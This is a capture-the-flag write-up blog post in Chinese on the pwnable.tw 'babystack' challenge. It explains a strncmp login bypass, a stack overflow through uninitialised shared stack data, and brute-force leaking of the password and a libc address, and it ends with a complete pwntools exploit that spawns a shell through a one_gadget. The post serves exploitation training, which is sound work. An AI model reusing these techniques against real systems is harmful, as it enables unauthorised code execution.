

<!DOCTYPE html>
<html lang="">
<head>
  


<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Pwnable.tw babystack [ An9Ela ]</title>

  <link rel="icon" href="/img/favicon.ico">


    <meta name="author" content="An9Ela">





  <link rel="alternate" href="/atom.xml " title="An9Ela" type="application/atom+xml">


  
    <link rel="stylesheet" href="/css/main.css">
  

<meta name="generator" content="Hexo 6.2.0"></head>
  <body data-theme="light" class="notransition">
    <script>
      const body = document.body;
      const data = body.getAttribute("data-theme");
      const initTheme = (state) => {
        if (state === "dark") {
          body.setAttribute("data-theme", "dark");
        } else if (state === "light") {
          body.removeAttribute("data-theme");
        } else {
          localStorage.setItem("theme", data);
        }
      };
   
      initTheme(localStorage.getItem("theme"));
      
      setTimeout(() => body.classList.remove("notransition"), 75);
    </script>
  <div class="navbar" role="navigation">
    <nav class="menu">
      <input type="checkbox" id="menu-trigger" class="menu-trigger" />
      <label for="menu-trigger">
        <span class="menu-icon">
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 512 512"
          >
            <path
              d="M64,384H448V341.33H64Zm0-106.67H448V234.67H64ZM64,128v42.67H448V128Z"
            />
          </svg>
        </span>
      </label>
      <a id="mode">
        <svg
          class="mode-sunny"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>LIGHT</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
        <svg
          class="mode-moon"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>DARK</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
      </a>
      <div class="trigger">
        <div class="trigger-container">
          
            
            
            
            
            
            
            <a class="menu-link " href="/"> Home</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/about/"> About</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/archives/"> Archives</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/tags/"> Tags</a>
          
        </div>
      </div>
    </nav>
  </div>
  
<div class="wrapper post">
  <main class="page-content" aria-label="Content">
      <header class="header">
        
          <div class="tags">
            <a href="/tags/CTF/" class="tag"># CTF</a><a href="/tags/PWN/" class="tag"># PWN</a>
          </div>
        
        <h1 class="header-title" itemprop="headline">Pwnable.tw babystack</h1>
          <div class="post-meta">
            <time>Oct 20, 2020</time>
            <span itemprop="author">
              <span itemprop="name">An9Ela</span>
            </span>
          </div>
        </header>

          <div class="page-content"><h3 id="Pwnable-tw-babystack"><a href="#Pwnable-tw-babystack" class="headerlink" title="Pwnable.tw babystack"></a>Pwnable.tw babystack</h3><blockquote>
<p>远程搞我心态🤬，收发改了半天，但漏洞点还是挺细节的。</p>
</blockquote>
<span id="more"></span>
<p>程式一开始先生成长度0x10的随机数并放在rbp-0x20的位置，并在bss上备份。<br>之后是菜单选项：</p>
<p>1是login要求我们输入password并根据我们输入的password的长度来和栈中相应位置进行比较。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">int __fastcall login(const char *a1)</span><br><span class="line">&#123;</span><br><span class="line">  size_t v1; // rax</span><br><span class="line">  char s; // [rsp+10h] [rbp-80h]</span><br><span class="line"></span><br><span class="line">  printf(&quot;Your passowrd :&quot;);</span><br><span class="line">  read_n((unsigned __int8 *)&amp;s, 0x7Fu);</span><br><span class="line">  v1 = strlen(&amp;s);</span><br><span class="line">  if ( strncmp(&amp;s, a1, v1) )</span><br><span class="line">    return puts(&quot;Failed !&quot;);</span><br><span class="line">  flag = 1;</span><br><span class="line">  return puts(&quot;Login Success !&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里有2个想法：<br>1.可以通过strncmp依次比较来爆破出password。2.strncmp(&amp;s, a1, v1)，&amp;s是我们的输入，在第一个参数，可通过输入’\x00’直接使其返回为0，login成功。</p>
<p>login之后我们就可以执行2的copy操作：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">int __fastcall sub_E76(char *a1)</span><br><span class="line">&#123;</span><br><span class="line">  char src; // [rsp+10h] [rbp-80h]</span><br><span class="line"></span><br><span class="line">  printf(&quot;Copy :&quot;);</span><br><span class="line">  read_n((unsigned __int8 *)&amp;src, 0x3Fu);</span><br><span class="line">  strcpy(a1, &amp;src);</span><br><span class="line">  return puts(&quot;It is magic copy !&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>为啥是magic copy?除了strcpy有点可疑，但也没明显的漏洞。</p>
<p>看了一遍下来除了爆破出password外没啥想法了🤦</p>
<p>之后一次偶然的尝试在得到password后由于我又多输入’a’*0x50，在copy执行strcpy之后返回主函数发现password被改为’a’了！！！</p>
<p>仔细调试在汇编里发现问题：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">login函数的栈帧：</span><br><span class="line"></span><br><span class="line">.text:0000000000000DEF                 push    rbp</span><br><span class="line">.text:0000000000000DF0                 mov     rbp, rsp</span><br><span class="line">.text:0000000000000DF3                 sub     rsp, 90h</span><br><span class="line"></span><br><span class="line">copy函数的栈帧：</span><br><span class="line">.text:0000000000000E76                 push    rbp</span><br><span class="line">.text:0000000000000E77                 mov     rbp, rsp</span><br><span class="line">.text:0000000000000E7A                 sub     rsp, 90h</span><br></pre></td></tr></table></figure>
<p>主调用函数都是main函数，这意味着login()和copy()函数是公用一个栈的！！！！</p>
<p>这样就能解释通了，在login()里输入的’a’会残存在栈里，当copy()再次用到这部分栈是，本是想利用read_n((unsigned __int8 *)&amp;src, 0x3Fu);最多输入0x3f那最后一个就是’\x00’来截断，但实际上栈里该处的位置已经被写入了’a’，可导致在strcpy时main函数的栈溢出。</p>
<p>思路有了，但没地址，肯定有办法泄露的。</p>
<p>想到password是通过strncmp的比较来获得的，且比较的长度可控，那我们也能用相同的办法泄露出stack里的地址。</p>
<p>这里我的思路的login时输入’\x00’+’1’*87，这样既能login成功又能改password为’1’*0x10，但为什么是87个呢，一方面是为了strcpy改password，另一个是由于在输入这么多的长度时，main函数stack里的passwoed(被改了的)后面会写入stdvbuf的地址！（至于为什么会写入这个地址，个人想法可能时执行了对输入流初始相关的操作，还有待研究），那这样的话就能通过再次login来leak出Libc地址。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; stack 50</span><br><span class="line">00:0000│ rsp  0x7ffd0e102f00 ◂— 0x6161616161616161 (&#x27;aaaaaaaa&#x27;)</span><br><span class="line">... ↓</span><br><span class="line">07:0038│      0x7ffd0e102f38 ◂— 0x3161616161616161 (&#x27;aaaaaaa1&#x27;)</span><br><span class="line">08:0040│      0x7ffd0e102f40 ◂— 0x3131313131313131 (&#x27;11111111&#x27;)  //password</span><br><span class="line">... ↓</span><br><span class="line">0a:0050│ rsi  0x7ffd0e102f50 ◂— 0x3131313131310a31 (&#x27;1\n111111&#x27;)</span><br><span class="line">0b:0058│      0x7ffd0e102f58 —▸ 0x7fdc09940fb4 (setvbuf+324) ◂— 0xfc085480b8bd231</span><br><span class="line">0c:0060│ rbp  0x7ffd0e102f60 —▸ 0x5555a2d50060 ◂— 0x41ff894156415741</span><br><span class="line">0d:0068│      0x7ffd0e102f68 —▸ 0x7fdc098f1830 (__libc_start_main+240) ◂</span><br></pre></td></tr></table></figure>
<p>如果只是改password，而没向下继续覆盖的话是这样的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; stack 50</span><br><span class="line">00:0000│ rsp  0x7ffc3b4fb510 ◂— 0x6161616161616161 (&#x27;aaaaaaaa&#x27;)</span><br><span class="line">... ↓</span><br><span class="line">07:0038│      0x7ffc3b4fb548 ◂— 0x3161616161616161 (&#x27;aaaaaaa1&#x27;)</span><br><span class="line">08:0040│      0x7ffc3b4fb550 ◂— 0x3131313131313131 (&#x27;11111111&#x27;)</span><br><span class="line">... ↓</span><br><span class="line">0a:0050│ rsi  0x7ffc3b4fb560 ◂— 0x7fac80980a31</span><br><span class="line">0b:0058│      0x7ffc3b4fb568 ◂— 0x0</span><br><span class="line">0c:0060│ rbp  0x7ffc3b4fb570 —▸ 0x55c28958a060 ◂— 0x41ff894156415741</span><br></pre></td></tr></table></figure>
<p>0x7fac80980a31这个地址看着像Libc里的，但实际上他和Libc的偏移是不固定的。</p>
<p>万事具备了，接下来就是在login时构造好stack，在copy里执行strcpy时将正确的password写入对应位置（退出时会和bss上备份的比较），并改ret_addr为one_gadget🚩</p>
<p>EXP:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>(<span class="params">addr,PIE=<span class="literal">True</span></span>):</span><br><span class="line">	<span class="keyword">if</span> PIE:</span><br><span class="line">		text_base = <span class="built_in">int</span>(os.popen(<span class="string">&quot;pmap &#123;&#125;| awk &#x27;&#123;&#123;print $1&#125;&#125;&#x27;&quot;</span>.<span class="built_in">format</span>(p.pid)).readlines()[<span class="number">1</span>], <span class="number">16</span>)</span><br><span class="line">		gdb.attach(p,<span class="string">&#x27;b *&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(<span class="built_in">hex</span>(text_base+addr)))</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		gdb.attach(p,<span class="string">&quot;b *&#123;&#125;&quot;</span>.<span class="built_in">format</span>(<span class="built_in">hex</span>(addr)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_password</span>(<span class="params"><span class="built_in">len</span>, flag=<span class="literal">False</span></span>):</span><br><span class="line">    secret=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1</span>,<span class="number">0x100</span>):</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">is</span> <span class="literal">True</span> <span class="keyword">and</span> j == <span class="number">0x10</span>:</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">            p.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">            p.recvuntil(<span class="string">&quot;Your passowrd :&quot;</span>)</span><br><span class="line">            temp = secret+<span class="built_in">chr</span>(j)+<span class="string">&quot;\x00&quot;</span></span><br><span class="line">            p.sendline(temp)</span><br><span class="line">            recv = p.recvuntil(<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Success&quot;</span> <span class="keyword">in</span> recv:</span><br><span class="line">                secret += <span class="built_in">chr</span>(j)</span><br><span class="line">                log.success(<span class="string">&quot;password: &quot;</span>+secret)</span><br><span class="line">                p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">                p.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> secret</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>(<span class="params">host,port=<span class="number">1234</span></span>):</span><br><span class="line">    <span class="keyword">global</span> p</span><br><span class="line">    <span class="keyword">if</span> host:</span><br><span class="line">        p=remote(host,port)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p=process(<span class="string">&quot;./babystack&quot;</span>,env=&#123;<span class="string">&quot;LD_PRELOAD&quot;</span>:<span class="string">&quot;./libc_64.so.6&quot;</span>&#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	secret=get_password(<span class="number">0x10</span>)</span><br><span class="line">	<span class="comment"># debug(0x000000FA6)</span></span><br><span class="line">	p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">	p.send(<span class="string">&#x27;\x00&#x27;</span>+<span class="string">&#x27;1&#x27;</span>*(<span class="number">47</span>+<span class="number">32</span>))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">	p.send(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x3f</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">	guess=<span class="string">&#x27;1&#x27;</span>*<span class="number">0x11</span>+<span class="string">&#x27;\n&#x27;</span>+<span class="string">&#x27;1&#x27;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x6</span>):</span><br><span class="line">	    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x1</span>,<span class="number">0x100</span>):</span><br><span class="line">	        p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	        p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	        p.recvuntil(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">	        p.send(guess+<span class="built_in">chr</span>(i)+<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">	        recv=p.recvuntil(<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">	        <span class="keyword">if</span> <span class="string">&#x27;Success&#x27;</span> <span class="keyword">in</span> recv:</span><br><span class="line">	            guess+=<span class="built_in">chr</span>(i)</span><br><span class="line">	            success(<span class="string">&quot;guess: &quot;</span>+guess)</span><br><span class="line">	            p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	            p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	            <span class="keyword">break</span></span><br><span class="line">	libc.address=u64(guess[<span class="number">24</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x06ffb4</span></span><br><span class="line">	success(<span class="string">&quot;libc: &quot;</span>+<span class="built_in">hex</span>(libc.address))</span><br><span class="line">	one_gadget=libc.address+<span class="number">0xf0567</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">	p.send(<span class="string">&#x27;\x00&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">0x3f</span>+secret+<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(one_gadget))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">	p.send(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x3f</span>)</span><br><span class="line">    <span class="comment"># gdb.attach(p)</span></span><br><span class="line">	p.recvuntil(<span class="string">&quot;&gt;&gt; &quot;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    libc=ELF(<span class="string">&quot;./libc_64.so.6&quot;</span>)</span><br><span class="line">    main(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>
</div>
          <nav class="post-nav">
    
    <a class="post-nav-item post-nav-prev" href="/2020/10/26/ByteCTF2020%E5%88%9D%E8%B5%9B/">
      <div class="nav-arrow">&lt;&nbsp;NEWER</div>
      <span class="post-title">ByteCTF初赛</span>
    </a>
    
    
    <a class="post-nav-item post-nav-next" href="/2020/10/19/Pwnable_re-alloc/">
      <div class="nav-arrow">OLDER&nbsp;&gt;</div>
      <span class="post-title">Pwnable.tw re-alloc</span>
    </a>
    
  </nav>

   </main>
</div>

  <footer class="footer">
    <small class="footer_copyright">
      <div id="bottom-inner">
        © 2021 Site by An9Ela using
        <a target="_blank" rel="noopener" href="http://hexo.io">hexo blog framework</a>.
        <br>
        <p> Theme is <a href="https://github.com/dewjohn/hexo-theme-klise">Klise</a></p>
      </div>
    </small>
  </footer>
  
  

    
      <script src="/js/main.js"></script>
    
  
  <script>
    window.FPConfig = {
      delay: 0,
      ignoreKeywords: [],
      maxRPS: 3,
      hoverDelay: 50,
    };
  </script>
  <script defer src="https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"></script>
</body>
</html>
